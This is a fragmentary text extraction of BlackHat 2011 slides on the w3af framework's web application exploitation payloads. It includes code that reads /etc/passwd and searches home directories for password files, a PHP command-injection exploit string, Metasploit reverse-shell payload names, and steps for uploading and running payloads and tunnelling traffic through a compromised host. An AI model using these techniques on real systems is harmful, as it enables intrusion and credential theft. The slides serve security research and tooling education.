Web Application Security Payloads Andrs Riancho Director of Web - - PowerPoint PPT Presentation
Web Application Security Payloads Andrs Riancho Director of Web Security BlackHat 2011 - Barcelona Topics Short w3af introduction Whats new in w3af Automating Web application exploitation The problem and how other tools are
Andrés Riancho Director of Web Security BlackHat 2011 - Barcelona
2
– Vulnerabilities have capabilities! – Abstracting system calls in payloads – Our own SCA – Metasploit integration – Routing TCP/IP traffic
3
4
The features and the behind the scenes story
5
Attack and Audit Framework
– First version released in March 2007 – Open Source tool (GPLv2.0) to identify and exploit Web vulnerabilities – Architecture supports plug-ins (easily extensible) – Available for free download @ www.w3af.org
– Since July 2010 – Full time development resources – Roadmap, prioritized backlog & structured development process – Quality assurance – Back office including marketing and communications
6
7
This is how it looks…
8
these goals:
– A low false negative rate – Good link and code coverage – Widely known, distributed in most (all?) hacking live-cds – Packages for most linux distributions
9
How we improved w3af in the last 3 months
10
– Introduced the usage of XPATH queries that will allow us to improve performance and reduce false positives in grep plugins.
– user_defined_regex.py – form_autocomplete.py
11
Andalía! (w3afMustStopException: The xUrllib found too much consecutive errors.
The remote webserver doesn't seem to be reachable anymore; please verify manually.)
backend with a Bloom filter, increasing the framework’s performance in ~15%.-
the latest features and bug fixes we develop daily.
12
– Achieve stable code base – Increase performance for the core framework features (sending
etc.)
quickly achieve what users need:
– Identify 100% of the vulnerabilities - Scan time doesn‘t matter – Low False positive rate – Plugin / Extension system documentation
13
And how other tools are not covering it
14
Vuln!
2 hours
3 hours
6 hours
15
– None of the currently available tools, Open Source or Commercial, have any post exploitation techniques we could apply to Web application vulnerabilities in order to escalate privileges. – Commercial exploitation platforms provide “exploits and payloads” to use in best case scenarios, in other words, when there is control on the execution flow (“exploits for buffer
16
exploits because they were the most important vulnerability class.
different because they only allows us, depending on the vulnerability, to interact with the system in a particular way:
– Read a file – Write a file – Control a section of a SQL query – Execute user controlled source code – Execute operating system commands
17
Helping you get root from low-privileged vulnerabilities
18
simple examples:
exploitation with reduced capabilities, we started to define all the actions that could be done only with read()’s:
– Read Apache config files, – Read .htpasswd files, – Get the remote process list, – Get the list of open TCP and UDP connections, and MANY more.
Web application vulnerability Capabilities exported Arbitrary File Read read() File upload write() [often restricted to specific directory]
19
moved on to different scenarios where we analyzed:
– Only write() – Only exec() – write() and read() , which is usually found when there are two different vulnerabilities present.
20
payloads:
without knowing/caring which exploit is in use.
Exploit Exported Syscalls Emulated system calls Local file read read() Local file include read() OS Commanding execute() read() , write() , unlink() DAV Shell write() execute() , read(), unlink() File Upload write() execute() , read(), unlink()
21
emulated via the execution of "cat filename" or "type filename", depending on the OS:
challenging due to file system permissions, programming language configuration and the application itself.
22
files to read and how to extract information from them:
Knowledge read()
Parse
23
within w3af is very easy
These are the steps that will be shown in the demo:
1. Start a w3af scan 2. Identify arbitrary file read vulnerability 3. Execute the “users” payload:
4. Show the results
24
Baby steps
25
read() System call to read files users Payload that reads “/etc/passwd” and identifies home directories interesting_files This payload uses the home directories and a list of interesting filenames to search for passwords.
26
interesting_extensions = [] interesting_extensions.append('') # no extension interesting_extensions.append('.txt') ... file_list = [] file_list.append('passwords') file_list.append('passwd') ... for user in users_result: home = users_result[user]['home'] for interesting_file in file_list: for extension in interesting_extensions: file_fp = home + interesting_file + extension files_to_read.append( file_fp )
27
Treasure hunt
28
saved to the knowledge base during the scan:
– Identified vulnerabilities – Remote Web server type (Apache, IIS, etc.) – Remote operating system – Found URLs
integrated into w3af!
29
apache_root_directory = self.exec_payload('apache_root_directory') webroot_list = apache_root_directory['apache_root_directory'] url_list = kb.kb.getData('urls', 'urlList') for webroot in webroot_list: for url in url_list: path_and_file = getPath( url ) relative_path_file = path_and_file[1:] remote_full_path = os.path.join(webroot,relative_path_file) file_content = self.shell.read(remote_full_path) if file_content: self._save_file_locally(remote_full_path, file_content)
30
w3af integration
31
32
possible :)
information we needed.
with Javier Andalia from Rapid7 we’ve developed a PHP Static Code Analyzer as a PoC to show that it is possible to combine these two technologies:
– Black-Box scanning – Static Code Analysis
33
w3af scan Identify local file read Exploit read() SCA Identify SQLi Exploit write() exec()
34
Lex-Yacc)
– SQL Injection – OS Commanding – Arbitrary file read – Remote file inclusion – eval() vulnerabilities – Taint analysis
35
sources of user controlled data:
– $_GET[] – $_POST[] – $_COOKIE[] – $_REQUEST[]
sensitive functions like system() , eval() and mysql_query()
into account validation functions such as escapeshellarg() and intval()
36
– Tainted variable $bar created as concatenation of 'ls ' and user controlled variable $_GET['foo'] – Tainted variable $bar used as parameter #1 of system() in line 2 – Exploit: /filename.php?bar=;ls
<? $bar = 'ls ' . $_GET['foo']; system( $bar ); ?>
37
– Tainted variable $foo declared in line 2, taint source is $_GET['bar'] – $foo is now clean for OS Commanding.
<? $foo = $_GET['bar']; $foo = escape_shell_args( $foo ); system( 'ls ' . $foo ); ?>
38
A step closer to retirement
39
many important functions such as:
– Support for require_once() , require(), include_once(), include() – Better support for loops and if statements – Classes, methods and attributes – Detection for all vulnerabilities
41
That was easy!
42
commands using our web application payloads that run with low privileges, now what?
payloads:
– msf_linux_x86_meterpreter_reverse – msf_windows_meterpreter_reverse_tcp – msf_windows_vncinject_reverse – w3af_agent
43
through the following steps:
1. w3af runs msfpayload and creates an EXE/ELF 2. Upload the EXE file to the remote server using "echo" or a "reverse wget". 3. Run a msfcli with a payload handler in the w3af box 4. Run the payload in the remote host
44
msf_linux_x86_meterpreter_reverse
45
compromised host without any effort.
1. w3af uploads an agent client to the remote host 2. The agent client connects back, and the TCP connections are kept alive to route traffic. 3. w3af starts a SOCKS daemon in the local machine, which is the entry point for all connections that the user wants to forward.
46
Routing traffic through the compromised host
47
which we only have a small PoC, but I wanted to explain it here to get feedback and new ideas.
application security payload developer) was to create a framework that would hook into a process’ and forward it
application exploit.
installed on the host running w3af in the remote box. A simple example would be “clamav”.
48
emulated read()
49
with the reality of software; it's a foundation for building tools to do tracing, sandboxing, and many other things. You could think of it as "strace meets expect".”
ptrace and modifying it’s state, but has two big issues:
– Not supported by the orginal developer anymore – Doesn’t work in 64bit arch.
50
# Called before linux’s read() syscall def callbefore(self, pid, call, args): m = Memory.getMemory(pid) arg_mem_addr_path = args[0] filename = m.get_string( arg_mem_addr_path ) # Calling the “read” syscall of one of w3af’s exploits local_filename = self.shell.download( filename ) area, area_size = m.areas()[0] m.poke(area, local_filename + '\0') # Rewrite the syscall in order to read the local file return (None, None, None, (area, args[1], args[2]) )
51
– Launch a new scan against a particular resource – Exploit vulnerabilities using the increased knowledge obtained by w3af’s payloads
explotation of Web application vulnerabilities.
52
http://www.w3af.org/mailing-list.php
application security payloads, w3af agent and metasploit wrapper can be found in these directories:
– plugins/attack/payloads/ – core/controllers/vdaemon/ – core/controllers/w3afAgent/ – core/controllers/payloadTransfer/
http://w3af.svn.sourceforge.net/viewvc/w3af/trunk/
53
Application Center of Excellence in Buenos Aires
Web Application Center of Excellence, Buenos Aires, Argentina